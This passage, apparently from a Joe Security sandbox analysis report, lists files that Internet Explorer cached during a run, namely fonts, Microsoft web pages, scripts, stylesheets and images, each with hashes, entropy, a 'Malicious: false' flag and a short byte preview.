Preview: /*! jQuery v1.11.2 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[1].eot

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Embedded OpenType (EOT), Segoe UI Semibold family

Size (bytes): 30643

Entropy (8bit): 7.976822258863597

Encrypted: false

MD5: E812BA8B7E2A657F2B70CFACE93C7682

SHA1: 2F02CDDBB483F9B11BBBE74C3CA917A4C345FBAD

SHA-256: 3330C1DEAC468874238DD0C6BF902179A8731EDA8A208C7D01DAC0AB1EAE1BC9

SHA-512: 354B2DB12BC1D67F26F94352B0B663DAD64C46C107454FC19CFEA01C54BB09340BC26C06DE1B96FF826F5287CE246A6317722BAE41B72B63BA86FDAF844BA94E

Malicious: false

Preview: .w...v......................X.....LP#...B.............. ..........................".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2...".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d........H.P..lb.7^......U.D.-..iu...:4P\..GLFM.Y.#?.;..-...~}_).z{.rmD.1".$.....{.t.....=...!cK...%.~.....g........j.9S....6. ..n..V.]pz...e.....#X...=,.p.F..6&.VR...k$~J..n....7.......K.8..T.....x..J......#.J.XaQ.Q%_{3..xr.... 0Dm...k..Ep..........>..?Pk!KB..C...Q.q..1=6<,.S.F.&B..J.....ya2b."S.......6.2.......H......*..09A...Tb/.&.d..#.E.:.E.(..I5.M..444d.1........K..l...l.O..VBb...:..:b..Mh.'=4.d/..o.k.mMm........bx..!..S.@E.....>@:..k.JCas..7."..uG3hR.h..w..8W>.4.........pX....J..a....}.Y......(>H^=.`=.mg*.!.....w'...J.<.ob..3A .../.....5%.'....XS0a......I.Ia....a...=..g..........{V1+.."_)7$2 O..!bb.=..|.s.1..2qm..#.O......+E(I..1....EgQ.....E)R.m.?.8.q...J.G.@!f..n.F.r#..(..2p.?.9.8..?.d]..s..0.9.f..A...r.iq....x.g.aO....S.....R0i..BT.yl.".<k...:&Ja.\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[2].eot

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Embedded OpenType (EOT), Segoe UI Light family

Size (bytes): 69595

Entropy (8bit): 7.992327121754015

Encrypted: true

MD5: 72010CDB678FBB4CAB5FE12406D7F5EF

SHA1: E7F06A3C0A88250845E14310A24CE209A7695BBC

SHA-256: 22BA31E135F725FF091E11C15EC3103465E3CB5FDCC736413CBBE2F441054638

SHA-512: 84B5E6BC5763A81592F3BE4AB08864540CCD9699DBD3090A4382AB458D191901D9889D8753CDC2952C3F2DCEF954F11E152C330D0915DFC3571221653107BA3D

Malicious: false

Preview: .n...m............................LP#...B.............. ............................S.e.g.o.e. .U.I. .L.i.g.h.t.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2.....S.e.g.o.e. .U.I. .L.i.g.h.t..........K..e..66......U.D.-..iu...4P\..GLFM..C?.;..-...~|...P..\.(..)RI.....>.>..CE..SsV.jPR...H.......].R..&.n.hT.......x.....q .......wA[....F.........c.".......Zed..>.?...`..3...B..W....R....F.j....v..'?.5.k^........+..a...).._].x.#QSi.....|<t....k.;..Hv1.G...L$.9....5.t.:...V.Y.......|[email protected]`..2.Z.0....2`.FR.MF8.x....GP0..$:.....PYm.22..."S."1.*j[=.=.mR.*.......j....&.4...k..][email protected]$......"y..C..g7..k.B*...V..F\...G.m.jK ...O....b.Qlo...!.N.V....t.[[email protected].."....R_i.4.$j.P..U....u9...<..6..4%........9`.....S...N.Y..L..B$2\.E.vhe...n..h..5..Z..K?.H..S...2..=R..x.....EX.2......$."....It8..z.+.h ..$.2*T....}Z../....p..b0ae.qq.(-v1..E.!.l".a..p.).;..8t..7..^..W...4A.D\eOb$......b.NI.Pe.#$.O38....,....g..&|...B{...].....9..u.8..~Y...3.X..ff.,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\mwfmdl2-v3.07[1].woff

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Web Open Font Format, TrueType, length 22376, version 0.0

Size (bytes): 22376

Entropy (8bit): 7.978063740714443

Encrypted: false

MD5: DAE68C4A8AAC30A0C75731AA3C7553F3

SHA1: 4E662B5F83B7F10E297A825072AAF87EE01E9FCC

SHA-256: 7F31CBB16DD8190854789BD1B43F15AE60940FB79AFBB7CFBEF664E12F8A247C

SHA-512: 20433B4530D557D360F9ED51B1DD1DE0C6EEC97B33E880D45898FBAF308A51A73104D04293CDA1959ABCA5C787BB0B2AE50DBA2576CC12D2816ADC74CD9B27E8

Malicious: false

Preview: wOFF......Wh.......|........................OS/2...X...H...`JZ.:VDMX.............^.qcmap............R..cvt ....... ...*....fpgm...........Y...gasp................glyf......G-..{2D.;.head..N....2...6....hhea..O........$$..|hmtx..O(.........yM.loca..O....~...~@l!.maxp..Qp... ... .Q..name..Q....6....`..Upost..V........ .Q.wprep..V.........x...x.c`..g......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...d.Xx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...]L.a...._9u.._...=T.a..B.1..G.n|..f.....a..D4...L...*5..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\privacystatement[1].htm

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

Size (bytes): 262788

Entropy (8bit): 4.719009857910025

Encrypted: false

MD5: 3850E04FBF51070B1AE70482472A8998

SHA1: 5136F76A01B24FE8D887CB5E4AE4D6490456811C

SHA-256: D20B8DF276BB85BC6D8D58F0BF2724B761C162B91428F4FBB3A3E14E748A4E26

SHA-512: 60E6418E613BBDC361DACC689DF108CFD31B214215EDD9CE8804497AFAD872FDA1ACBB6ED033173EABA888E82BF737A619923F9CF0245C76CEE7363788E17AFA

Malicious: false

Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="https://www.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js">.....// Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - http://www.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewpo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\reprocess[1].htm

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators

Size (bytes): 16399

Entropy (8bit): 5.53187594715885

Encrypted: false

MD5: 39ACCF5CA385E64C9F9EAE801DF34CAF

SHA1: 1F6EFA75F54F5A08E18FDC4C5F122EE725916932

SHA-256: 9D7213DFAA186B9D7620B57151FE3BE007678AEC0DAC0D24205448B83F300279

SHA-512: FF1CE433DB26D9079E05CE28ED35FEC482920D22F1CC16B44EB1094689D421C026E932501C378D2E3C6BD1D48F8407DA75225459963F4A9D99808612D422C6A7

Malicious: false

Preview: ....<!DOCTYPE html>..<html dir="ltr" class="" lang="en">..<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. .. <meta name="PageID" content="ConvergedError" />.. <meta name="SiteID" content="" />.. <meta name="ReqLC" content="1033" />.. <meta name="LocLC" content="en-US" />.. <noscript>.. <meta http-equiv="Refresh" content="0; URL=" />.. </noscript>.... .. <link rel="shortcut icon" href="https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" />.. .. <meta name="robots" content="none" />....<script type="text/javascript">//<![CDATA[.$Config={"strHeaderText":"Sign in","uns

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\style[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 816

Entropy (8bit): 4.949897846622861

Encrypted: false

MD5: 853BD04891E53E62DCC5EB93DC2D895E

SHA1: 7A77B42B76C1DCA1A526273E7A18738020E0290B

SHA-256: 26F6807B674D6A4CAAEDA21C3E3A5DAF0A018828FF045026B6306E9414EE0E47

SHA-512: FEEA2A298EB9B6EDD0CF5DC3D6473B9F280409147E4722D87C898ACC344566543CCDE986EA1CDBF717EEFF943147C8BC03C7FCF86A386EA4D62211A1E55B0D93

Malicious: false

Preview: body .grid,.body-open .grid,.grid h3,.grid .h3,.grid .header-small,.grid strong,.grid .body-tight-2,.grid h1,.grid .h1,.grid .header-large,.grid .caption{font-family:"Segoe UI"}.grid{max-width:1600px !important}.js-global-head .c-uhfh-gcontainer button.glyph-global-nav-button{display:none}.shell-header-wrapper,.shell-footer-wrapper,.shell-category-nav,.shell-notification .shell-notification-grid-row{max-width:1180px !important}.PsTitle{font-family:Segoe UI,sans-serif;margin-right:.3em !important;font-size:2em;display:inline-block;vertical-align:top;margin-left:-.02em}.childModule{margin-left:8% !important}.CollectingYourInfoRightNav{display:none}html[dir=rtl] .m-r-md{margin-right:0;margin-left:10px}html[dir=rtl] .m-l-md{margin-left:0;margin-right:10px}html[dir=rtl] .m-r-bl{margin-right:0;margin-left:40px}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with CRLF, LF line terminators

Size (bytes): 306089

Entropy (8bit): 5.466321305176346

Encrypted: false

MD5: 1AF095F9F7CAE6E78993BFBCCEC6667C

SHA1: CE3DE4032609A71B606AF35117D869C8DE0B80D8

SHA-256: E187E07E550C6C4204CFD912A23199C55BCF30FA76D20AB58ECDF2CD75CA5BCD

SHA-512: 11EB56F41CD094A7FFE5CCE756741148914C11E5C1EEDDF9CAE4DE960C8830D621AF201187F5BD8056152766B76EA30A298C0467F135205968A93934BFBAC6AD

Malicious: false

Preview: /*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------.. * .. * This file is based on or incorporates material from the projectslisted below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise... * .. * json2.js (2016-05-01).. * https://github.com/douglascrockford/JSON-js.. * License: Public Domain.. * .. * Provided for Informational Purposes Only.. * .. * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.!function(e){function t(n){if(i[n])return i[n].exports;var a=i[n]=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0-small_138bcee624fa04ef9b75e86211a9fe0d[1].jpg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x28, frames 3

Size (bytes): 101292

Entropy (8bit): 7.8172319338881335

Encrypted: false

MD5: D365F16C9A53DD752036CD8FB2591EEB

SHA1: 02C216E6A002834ADA9FBEEEE1401E7844587A03

SHA-256: 0DB3C3AD031F72C1404D7B7613971547299E27AD1B70FAABBB972E799EF01206

SHA-512: 1E6145EF39C72830CE7D483B88F6B5A183994044E2901729263614913A618D9396A3C6F893413D911B3FFA8AA565DEED3FBD297E7FF43F9561D94F673FC72015

Malicious: false

Preview: ......JFIF.....H.H.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0[1].jpg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 267298

Entropy (8bit): 7.984423733048217

Encrypted: false

MD5: 03A70BDE53DD775BF2798438F52E430A

SHA1: 37942898606FC0B94BF810181C03A11FC4483250

SHA-256: D6CF9E1F9EE42A9E3F00C701EBC4B39458402376E5D0EFE616F3E8C0E55A6FD4

SHA-512: 7E2247A421B8A7F2E2463D9627881DCAC95F95C32180041BF85E63F4A13807FBCF8897FCFCAFD1C7270D90BD56FFCA4635380E42E4A8BC642DA9F9755EB79A8A

Malicious: false

Preview: ...7d........x...(..^Wxo...d.xp(}.7ba.....^K....&LX..d..../%.a....W...@.....&...F...7d..Z......u..`.]xo(2..`.2...#..~...8.C.K....^M.qb..v.L....&.X..%..-.....d...Z.X.C^L.qb...L.Z.&L....^L5......V[!0....d.L..b.Ll.a.4..0........2..3h.....L.FI......&PL.2`.&L...&.2d...&..)/..b1H.;.....f....y..#2.C.`..%d.TM.%....X...X9.g.Z..rd.X.K.x/.Z.../.(k.x./.Z..n.......&..J..1b.y/.&,Pwd...(m.w.K.x.C..O.%.X....K..J..^-.Yhk.c..^,P./..Y(;.^-..=.[..(k..v...L...b.....n.d.....-...o...C.....-.y/..^,P..7d.....vM.P./..^,P....^,P...o........[%.Qe.vM...o..vM....n..%...K...C.K..%.P..v%.J..n9]..7`.x7`P.n..d.C..y].({.x.......K.x.G....2X..4Yc%.K.x....K.y.=....>./%..^..^L..vM.]....weW..R..7ew...7a..K.K7d.y/..vM.]..vM.U.P-.~U..@.~..]..7..r..x.Y.&.K.x..o.*.7....o......7...c%.f..|....[..........~M...%...w.w..@.~M.].P,.~Wc%[email protected].].QK|L>&[email protected].........).x....|\.v..@.....[.M..........o....la..].).d..]...NSc%......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0_a5dbd4393ff6a725c7e62b61df7e72f0[1].jpg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 185065

Entropy (8bit): 7.980943347042259

Encrypted: false

MD5: 46FEA73CD8377663DF7A840E9DEBF599

SHA1: 1FC10AD6A21A92C95C19A96878BD7BACC89EACFE

SHA-256: F38E56F2352DE13B5DFEBD579BD2DE87B81B61CB5DE6CB717DF65169D828D065

SHA-512: 82C92CE9F1ADAF7C0F06B06810BEF828600ECD392E25C1743A564545A91BBFD443512B89DE26966C0F31A331B4C865D778CA702AA8A897246C134E57EC01E902

Malicious: false

Preview: 1dRA.c..U.F.Gh7xj...g..tS.RP.27.O... b$(.BHO7Co..!A.o....=....L..)2....>....to$..b-..0a.O.f.(....W.^..D..>.V,..........g=iE%}=A&s...GP.W...p.."......lG.@<....?S.F.X...Tx.H|P.._"...h:g..N?..J.S"..=.[oP.....t...zC...Y.2..(......[a..f}&...HX..#[email protected].............}9..&../.XJ.j..s.8..9..7...<.......oq...f.!.Q...U.Y.X..V....pf.0H.v....[>...,......)......]>.I..'..6uE.E..9..vn..|D......U..AA.iC...z...L...i^y...~.......Q.q^i.......!.....h.yU.(........M...#[.n.F.E...VBG.C......b..:G.2.4m......w.nW...:t..9.wPe...?.t.B.x.l.123Yq..........zU...vY....O,.?....]@$..O7N.+..T.q...@lro.+..v..}.?...B.h.7..r..E.....y.Z...u..Q.q.LR&.S.pP...N..[.~..B.....$).v........)3|F(.G.k.)x....X~W.4..Y&[email protected])..4....r....j%a.}.}......W.r1.n........<....uuZ.........O,L.6..L..w`Y#...l.r..m&....4....`.jo/.Ls.G....[hB...w}[email protected]..._...t.&..~........1...#........X..T4.....-..[..TM,.,`.HN.[.......v'Nw8.|r~P.z.Y..\:}f.P.8.O..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\NewErrorPageTemplate[1]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1612

Entropy (8bit): 4.869554560514657

Encrypted: false

MD5: DFEABDE84792228093A5A270352395B6

SHA1: E41258C9576721025926326F76063C2305586F76

SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075

SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD

Malicious: false

Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\RE1Mu3b[1].png

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced

Size (bytes): 4054

Entropy (8bit): 7.797012573497454

Encrypted: false

Copyright Joe Security LLC 2019 Page 28 of 47

MD5: 9F14C20150A003D7CE4DE57C298F0FBA

SHA1: DAA53CF17CC45878A1B153F3C3BF47DC9669D78F

SHA-256: 112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960

SHA-512: D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487

Malicious: false

Preview: .PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\converged_ux_v2_pfEhDrELLHNcznXIOy__sQ2[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 96088

Entropy (8bit): 5.290692297364742

Encrypted: false

MD5: 7B634B9A5338663077D64B7E15859ADD

SHA1: 971C4049EA8572EF67426E929676B6C6402782DD

SHA-256: 0581D38458F25293B820B01FE058C1DAF8B2365CE6198BB43EC95385B4ECDD79

SHA-512: FF5D0696D2523D61915CFDFAB0F7DCF8562FA42E2731E1D79E62F32D82760D48A0CC466A5742795ED8F8A53C6A2AF140CE734A16929A176B4562C5FB97F1C8A7

Malicious: false

Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. ..//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any perso

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\errorPageStrings[1]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 4720

Entropy (8bit): 5.164796203267696

Encrypted: false

MD5: D65EC06F21C379C87040B83CC1ABAC6B

SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B

SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F

SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E

Malicious: false

Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\favicon[1].ico

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\httpErrorPagesScripts[1]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 12105

Entropy (8bit): 5.451485481468043

Encrypted: false

MD5: 9234071287E637F85D721463C488704C

SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152

SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649

SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384

Malicious: false

Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\icons[1].eot

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Embedded OpenType (EOT), icons family

Size (bytes): 18519

Entropy (8bit): 7.668180326917825

Encrypted: false

MD5: C443B409CE8632A587760F940862748F

SHA1: B1A8B7B8B6B1D4A436B36598D4BD73936BABD639

SHA-256: 39C39A6744CF958E497D3D0A2120F4A7BC0124359231C39E4EDF2387146B0F05

SHA-512: F1593347AC31D6D3B4F904341090B50FE6783F95A4FF2BFED5A96660F4DEF2BBE30DBE3D5EB9EE1DD0D603CFF73E219698B49F1FF35F8228F5B6F34F3C8259BF

Malicious: false

Preview: $.................................LP...........................G....................i.c.o.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.n.s................ OS/[email protected]...(...Vcmap.1.........Jglyf..........dhead.9.........6hhea.$.........$hmtx@...........loca". h...L...Bmaxp.3.`....... name............post{NK............................................ ........G..._.<............|.......|......................... .T...................................D.l...H.D.l....................................PfEd.@...........................................................................................................................................................................D...........(............................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\latest[1].eot

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 20916

Entropy (8bit): 7.972782105593206

Encrypted: false

MD5: 1BB0A7EC21A09DA6473E9423345D6FEB

SHA1: 71FF957FBB5A00BF417573C1EC51CB20E89DBF4B

SHA-256: 095C35B21BB3328173E2E6BFF0772CD25488820C7FD3505915D19858E31D60F7

SHA-512: 4E436297FFF3E18E0190DD8457418999327D94CC50328EE9889460FC2F58DEA7E34A89FD796F84A6604066EB8BC14437DDF5689D6947651889CB2A472ABEE01A

Malicious: false

